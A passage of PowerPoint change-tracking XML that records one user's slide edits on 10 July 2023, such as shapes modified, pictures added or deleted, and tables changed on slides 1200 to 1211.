        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T15:23:17.789" v="1133" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3938931318" sldId="1200"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T15:19:59.924" v="1084" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3938931318" sldId="1200"/>
            <ac:spMk id="4" creationId="{AE79AAD0-1CE8-5B1D-C43C-0A1A6DC5E0AE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T15:23:17.789" v="1133" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3938931318" sldId="1200"/>
            <ac:spMk id="7" creationId="{CDBD9542-2DBF-D2E7-B05A-482A7199C2BD}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T15:18:46.907" v="1041"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3938931318" sldId="1200"/>
            <ac:picMk id="5" creationId="{90BF8F35-58F7-5CE2-04EC-CA12BFDBF646}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T15:18:47.938" v="1042"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3938931318" sldId="1200"/>
            <ac:picMk id="6" creationId="{6C1F13D9-E89E-E8D1-8729-91A58E6473D0}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T15:21:03.348" v="1088" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3938931318" sldId="1200"/>
            <ac:picMk id="8" creationId="{41B0A64E-9B7D-F234-D5EE-2DE5A7AECA08}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T15:23:11.351" v="1132" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3938931318" sldId="1200"/>
            <ac:picMk id="9" creationId="{5B425893-3D47-3C6F-735D-A0F620A1083C}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add replId">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T15:45:56.937" v="1666"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3068577413" sldId="1201"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T15:25:06.527" v="1169" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3068577413" sldId="1201"/>
            <ac:spMk id="4" creationId="{AE79AAD0-1CE8-5B1D-C43C-0A1A6DC5E0AE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T15:25:11.027" v="1171"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3068577413" sldId="1201"/>
            <ac:spMk id="7" creationId="{CDBD9542-2DBF-D2E7-B05A-482A7199C2BD}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="add mod modGraphic">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T15:45:56.937" v="1666"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3068577413" sldId="1201"/>
            <ac:graphicFrameMk id="5" creationId="{C5EA211B-14AC-0385-C983-3D175C0D4AA2}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
        <pc:picChg chg="del">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T15:24:32.869" v="1141"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3068577413" sldId="1201"/>
            <ac:picMk id="8" creationId="{41B0A64E-9B7D-F234-D5EE-2DE5A7AECA08}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T15:24:33.182" v="1142"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3068577413" sldId="1201"/>
            <ac:picMk id="9" creationId="{5B425893-3D47-3C6F-735D-A0F620A1083C}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="add del replId">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T15:34:24.839" v="1595"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2149898346" sldId="1202"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T15:57:36.691" v="2133" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3361033658" sldId="1202"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T15:57:31.801" v="2132" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3361033658" sldId="1202"/>
            <ac:spMk id="4" creationId="{AE79AAD0-1CE8-5B1D-C43C-0A1A6DC5E0AE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="mod modGraphic">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T15:57:36.691" v="2133" actId="1076"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3361033658" sldId="1202"/>
            <ac:graphicFrameMk id="5" creationId="{C5EA211B-14AC-0385-C983-3D175C0D4AA2}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp add replId modNotes">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:40:11.193" v="2344"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1505967475" sldId="1203"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T15:49:58.850" v="1800"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1505967475" sldId="1203"/>
            <ac:spMk id="4" creationId="{AE79AAD0-1CE8-5B1D-C43C-0A1A6DC5E0AE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="mod modGraphic">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:00:04.133" v="2256"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1505967475" sldId="1203"/>
            <ac:graphicFrameMk id="5" creationId="{C5EA211B-14AC-0385-C983-3D175C0D4AA2}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="add del replId">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T15:35:32.279" v="1598"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1556067835" sldId="1203"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp add replId modNotes">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:45:36.062" v="2412" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="306369126" sldId="1204"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:39:48.833" v="2337" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="306369126" sldId="1204"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:45:36.062" v="2412" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="306369126" sldId="1204"/>
            <ac:spMk id="4" creationId="{AE79AAD0-1CE8-5B1D-C43C-0A1A6DC5E0AE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:42:52.042" v="2349"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="306369126" sldId="1204"/>
            <ac:spMk id="6" creationId="{4725628E-BBE1-B8E2-1A3B-DE00A7BDEBC2}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:40:15.990" v="2345"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="306369126" sldId="1204"/>
            <ac:picMk id="7" creationId="{D6F6EE8C-AABF-049A-1000-B0FC671EEAA8}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add replId modNotes">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:46:47.095" v="2443" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="261614295" sldId="1205"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:45:40.390" v="2414" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="261614295" sldId="1205"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:46:31.891" v="2437" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="261614295" sldId="1205"/>
            <ac:spMk id="4" creationId="{AE79AAD0-1CE8-5B1D-C43C-0A1A6DC5E0AE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:46:47.095" v="2443" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="261614295" sldId="1205"/>
            <ac:picMk id="5" creationId="{19E855B3-97D3-19F3-8BC6-A5683FE6D491}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add replId modNotes">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T17:05:21.812" v="2786"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1612873292" sldId="1206"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:47:31.065" v="2452" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1612873292" sldId="1206"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:49:05.067" v="2495" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1612873292" sldId="1206"/>
            <ac:spMk id="4" creationId="{AE79AAD0-1CE8-5B1D-C43C-0A1A6DC5E0AE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="add mod modGraphic">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T17:05:21.812" v="2786"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1612873292" sldId="1206"/>
            <ac:graphicFrameMk id="5" creationId="{721CB557-F197-A7F7-6626-380F8D0562CC}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add replId modNotes">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T17:05:07.421" v="2771"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="628139488" sldId="1207"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:57:28.362" v="2759" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="628139488" sldId="1207"/>
            <ac:spMk id="4" creationId="{AE79AAD0-1CE8-5B1D-C43C-0A1A6DC5E0AE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="del">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:55:25.999" v="2708"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="628139488" sldId="1207"/>
            <ac:graphicFrameMk id="5" creationId="{721CB557-F197-A7F7-6626-380F8D0562CC}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T16:57:39.675" v="2764" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="628139488" sldId="1207"/>
            <ac:picMk id="6" creationId="{6B86E0F3-B946-CDA1-9E22-B443CA4D7014}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp add replId modNotes">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T17:13:48.513" v="2932" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4167872139" sldId="1208"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T17:09:35.913" v="2833" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4167872139" sldId="1208"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T17:13:48.513" v="2932" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4167872139" sldId="1208"/>
            <ac:spMk id="4" creationId="{AE79AAD0-1CE8-5B1D-C43C-0A1A6DC5E0AE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T17:08:53.115" v="2788"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4167872139" sldId="1208"/>
            <ac:picMk id="6" creationId="{6B86E0F3-B946-CDA1-9E22-B443CA4D7014}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add replId modNotes">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T17:16:25.721" v="2959" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1384877880" sldId="1209"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T17:15:18.672" v="2941" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1384877880" sldId="1209"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T17:16:25.721" v="2959" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1384877880" sldId="1209"/>
            <ac:spMk id="4" creationId="{AE79AAD0-1CE8-5B1D-C43C-0A1A6DC5E0AE}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add replId modNotes">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T17:17:37.488" v="3024" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1004745134" sldId="1210"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T17:16:41.456" v="2985" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1004745134" sldId="1210"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T17:17:37.488" v="3024" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1004745134" sldId="1210"/>
            <ac:spMk id="4" creationId="{AE79AAD0-1CE8-5B1D-C43C-0A1A6DC5E0AE}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add replId modNotes">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:32:25.349" v="3281" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3803093768" sldId="1211"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:24:51.647" v="3139" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3803093768" sldId="1211"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:25:13.913" v="3144" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3803093768" sldId="1211"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:32:25.349" v="3281" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3803093768" sldId="1211"/>
            <ac:spMk id="5" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add replId modNotes">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T21:34:25.759" v="3323" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
